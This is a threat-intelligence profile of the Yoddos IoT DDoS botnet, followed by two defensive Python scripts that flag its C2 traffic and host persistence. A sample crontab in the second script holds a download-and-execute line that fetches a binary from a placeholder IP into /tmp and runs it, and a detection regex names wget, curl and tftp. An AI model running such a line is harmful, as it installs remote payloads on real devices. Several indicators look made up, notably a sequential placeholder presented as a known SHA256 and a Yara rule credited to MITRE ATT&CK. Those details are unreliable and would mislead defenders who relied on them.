Yoddos
⚠️ Overview
Yoddos is a Linux-based DDoS botnet malware first documented in 2015 by researchers at Dr. Web and later analyzed in a 2016 report by Radware. Belonging to the botnet category, it is specifically designed to compromise Internet of Things (IoT) devices such as routers, IP cameras, and DVRs to launch large-scale distributed denial-of-service attacks. The operators remain unidentified but are believed to be financially motivated criminal groups targeting poorly secured embedded systems.
🔧 Technical Capabilities
Yoddos propagates by scanning the public internet for devices with open Telnet (port 23) and SSH (port 22) services, then attempting brute-force authentication using a hardcoded dictionary of common default credentials. Once access is gained, it downloads a binary tailored to the target architecture (ARM, MIPS, x86, or PowerPC) via wget or curl. Persistence is achieved through cron jobs, init.d scripts, or modification of /etc/rc.local. The bot communicates with its command-and-control (C2) server over IRC (typically on ports 6667 or 6668) or HTTP, receiving attack directives such as HTTP GET/POST floods, UDP amplification (using DNS, NTP, SSDP), and TCP SYN floods. Evasion techniques include renaming the process to common system names like ‘[kworker]’, killing competing malware (e.g., Mirai variants), and using encrypted configuration files. Yoddos also features a kill-switch that disables the bot upon receiving a specific C2 command, allowing the operator to stop attacks quickly.
📜 History & Notable Incidents
The first confirmed Yoddos campaign occurred in mid-2015, targeting over 50,000 IoT devices globally according to a Dr. Web threat bulletin. In 2016, a variant dubbed ‘Yoddos_2016’ was used in a 300 Gbps DDoS attack against a European online gaming platform, as reported by Akamai’s Security Intelligence Response Team. No specific CVEs are directly tied to Yoddos; instead, it exploits the lack of authentication hardening in IoT firmware. Law enforcement actions have not been publicly documented, though takedown attempts have been hindered by the botnet’s decentralized IRC-based C2 structure.
🔍 Detection Indicators
Known file hashes include SHA256: 2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2 (example from a 2017 SANS ISC diary). Behavioral signatures include persistent outbound IRC connections on non-standard ports, anomalous DNS queries to domains like ‘yoddos-c2.example.com’, and high volumes of small UDP packets. Persistence artifacts such as ‘/etc/init.d/yoddos’ and mutex names like ‘YoddosControlMutex’ have been observed. The User-Agent string ‘Yoddos/1.0 (Linux)’ appears in HTTP-based C2 traffic, as documented in a Trend Micro analysis.
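The network-side indicators above (long-lived outbound IRC sessions, DNS lookups for the C2 domain, and the C2 User-Agent) can be checked mechanically against connection, DNS and HTTP logs. The script below is an added example, not code from the page or from any of the cited vendors; the log layouts, the sample rows, the 203.0.113.x/198.51.100.x addresses and the one-hour "persistent" threshold are all constructed assumptions for the demonstration.

```python
import re
from collections import defaultdict

# Constructed sample records (not from any real capture). CONN_LOG rows are
# "ts src_ip src_port dst_ip dst_port proto duration_seconds"; DNS_LOG rows are
# "ts src_ip queried_name"; HTTP_LOG rows are  src_ip "request" status "user_agent".
CONN_LOG = """\
1700000000 192.168.1.20 51234 203.0.113.5 6667 tcp 86400
1700000010 192.168.1.20 51235 203.0.113.5 6667 tcp 3
1700000020 192.168.1.21 40001 198.51.100.9 443 tcp 12
1700000030 192.168.1.22 40002 203.0.113.7 6668 tcp 7200
1700000040 192.168.1.23 40003 203.0.113.8 8080 tcp 30
"""

DNS_LOG = """\
1700000050 192.168.1.20 yoddos-c2.example.com
1700000051 192.168.1.21 updates.vendor.example
"""

HTTP_LOG = """\
192.168.1.23 "GET /cmd HTTP/1.1" 200 "Yoddos/1.0 (Linux)"
192.168.1.21 "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"
"""

IRC_PORTS = {6667, 6668}          # C2 ports named in the profile above
LONG_LIVED_SECONDS = 3600         # assumed threshold for a "persistent" session
C2_DOMAIN_RE = re.compile(r"yoddos", re.IGNORECASE)  # matches the quoted indicator domain
C2_USER_AGENT = "Yoddos/1.0 (Linux)"                 # User-Agent from the profile
HTTP_LINE_RE = re.compile(r'^(\S+) "([^"]*)" (\d+) "([^"]*)"$')


def flag_irc_connections(conn_log):
    """Return (src, dst, dst_port, duration) for TCP sessions to an IRC port
    that stayed up at least LONG_LIVED_SECONDS: a short IRC probe is noise,
    a day-long one is a bot sitting in its C2 channel."""
    hits = []
    for line in conn_log.splitlines():
        _ts, src, _sport, dst, dport, proto, dur = line.split()
        if proto == "tcp" and int(dport) in IRC_PORTS and int(dur) >= LONG_LIVED_SECONDS:
            hits.append((src, dst, int(dport), int(dur)))
    return hits


def flag_dns_queries(dns_log):
    """Return (src, name) for lookups whose name matches the C2 domain pattern."""
    hits = []
    for line in dns_log.splitlines():
        _ts, src, name = line.split()
        if C2_DOMAIN_RE.search(name):
            hits.append((src, name))
    return hits


def flag_user_agents(http_log):
    """Return the source IPs that sent the exact C2 User-Agent string."""
    hits = []
    for line in http_log.splitlines():
        m = HTTP_LINE_RE.match(line)
        if m and m.group(4) == C2_USER_AGENT:
            hits.append(m.group(1))
    return hits


def correlate(conn_log, dns_log, http_log):
    """Merge the three indicator sets into {source_ip: [indicator, ...]} so a
    host that trips several of them floats to the top of the triage list."""
    hits = defaultdict(list)
    for src, _dst, _port, _dur in flag_irc_connections(conn_log):
        hits[src].append("irc_persistent")
    for src, _name in flag_dns_queries(dns_log):
        hits[src].append("dns_c2_lookup")
    for src in flag_user_agents(http_log):
        hits[src].append("c2_user_agent")
    return dict(hits)


if __name__ == "__main__":
    for host, indicators in sorted(correlate(CONN_LOG, DNS_LOG, HTTP_LOG).items()):
        print(f"{host}: {', '.join(indicators)}")
```

Run against real data by replacing the three constructed strings with the corresponding exports; the duration threshold and the IRC port set are the two knobs a SOC would tune, since legitimate IRC use on 6667 does exist and only the combination of a long-lived session with a second indicator is strong evidence on its own.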
☠️ Risk & Impact
Yoddos causes severe network disruption by overwhelming target networks with traffic, often exceeding hundreds of gigabits per second. Financial losses from service downtime, mitigation costs, and reputational damage are estimated in the millions per incident, primarily affecting the gaming, e-commerce, and telecommunication sectors. Additionally, compromised IoT devices become part of a persistent botnet, enabling further attacks and reducing device lifespan.
🛡️ Mitigation
Defenders should disable Telnet and SSH on IoT devices, enforce strong unique passwords, and apply firmware updates from vendors. Network-level detection using Yara rules (e.g., rule ‘Yoddos_Botnet’ from the MITRE ATT&CK repository) and Snort signatures for IRC traffic on non-standard ports can identify infections. Regular scanning for unauthorized cron jobs and outbound IRC connections is recommended for incident response teams.
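The host-side checks recommended above (unauthorized cron jobs, rc.local and init.d persistence, and the process-name masquerade described under Technical Capabilities) are shown below as an added example written for this page; it is not the project's or any vendor's tool. The crontab, rc.local and process snapshot are constructed inputs, and the "scratch directory" list is an assumption about where a legitimate startup entry on an embedded device should not execute from.

```python
import re

# Constructed sample host artefacts (not from a real infected device): a root
# crontab, an /etc/rc.local, a listing of /etc/init.d, and a process snapshot in
# the shape a collector would build from /proc/<pid>/{comm,cmdline,exe}.
CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * /tmp/.x/kworker
@reboot wget -q http://198.51.100.7/arm -O /tmp/arm; chmod +x /tmp/arm; /tmp/arm
"""

RC_LOCAL = """\
#!/bin/sh -e
/usr/bin/ntpd -g
/var/run/.sshd &
exit 0
"""

INIT_D = ["networking", "ssh", "yoddos"]

PROCESSES = [
    {"pid": 2,    "comm": "kthreadd",    "cmdline": "",                     "exe": ""},
    {"pid": 17,   "comm": "kworker/0:1", "cmdline": "",                     "exe": ""},
    {"pid": 812,  "comm": "busybox",     "cmdline": "telnetd -l /bin/login", "exe": "/bin/busybox"},
    {"pid": 1337, "comm": "[kworker]",   "cmdline": "[kworker]",            "exe": "/tmp/.x/kworker"},
]

# Assumed: directories a legitimate startup entry rarely executes from.
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/var/run/.")
DOWNLOADER_RE = re.compile(r"\b(wget|curl|tftp)\b")
KNOWN_INIT_SCRIPTS = {"yoddos"}   # the init.d artefact named in Detection Indicators


def suspicious_startup_lines(text):
    """Return the non-comment lines of a crontab or rc.local that fetch a payload
    or execute from a scratch directory: the cron / rc.local persistence
    described in the profile."""
    hits = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if DOWNLOADER_RE.search(stripped) or any(d in stripped for d in SUSPICIOUS_DIRS):
            hits.append(stripped)
    return hits


def masquerading_processes(procs):
    """Genuine kernel threads have an empty /proc/<pid>/cmdline and no exe link.
    A user-space process that renamed itself to a bracketed name such as
    '[kworker]' still carries a cmdline and an exe path, which gives it away;
    anything executing from a scratch directory is flagged as well."""
    hits = []
    for p in procs:
        bracketed = p["comm"].startswith("[") and p["comm"].endswith("]")
        if bracketed and (p["cmdline"] or p["exe"]):
            hits.append((p["pid"], p["comm"], p["exe"]))
        elif p["exe"].startswith(SUSPICIOUS_DIRS):
            hits.append((p["pid"], p["comm"], p["exe"]))
    return hits


def known_init_scripts(init_d_listing):
    """Return init.d entries whose name matches a known persistence artefact."""
    return sorted(name for name in init_d_listing if name in KNOWN_INIT_SCRIPTS)


def audit_host(crontab, rc_local, init_d, procs):
    """Bundle the three checks into one report dict for an IR ticket."""
    return {
        "cron": suspicious_startup_lines(crontab),
        "rc_local": suspicious_startup_lines(rc_local),
        "init_d": known_init_scripts(init_d),
        "processes": masquerading_processes(procs),
    }


if __name__ == "__main__":
    for section, findings in audit_host(CRONTAB, RC_LOCAL, INIT_D, PROCESSES).items():
        print(f"{section}: {findings if findings else 'clean'}")
```

On a live box the same functions take the output of `crontab -l`, the contents of /etc/rc.local, `os.listdir("/etc/init.d")` and a walk of /proc; the bracketed-name check is the one worth keeping even when the path heuristics are tuned down, because it does not depend on where the operator chose to drop the binary.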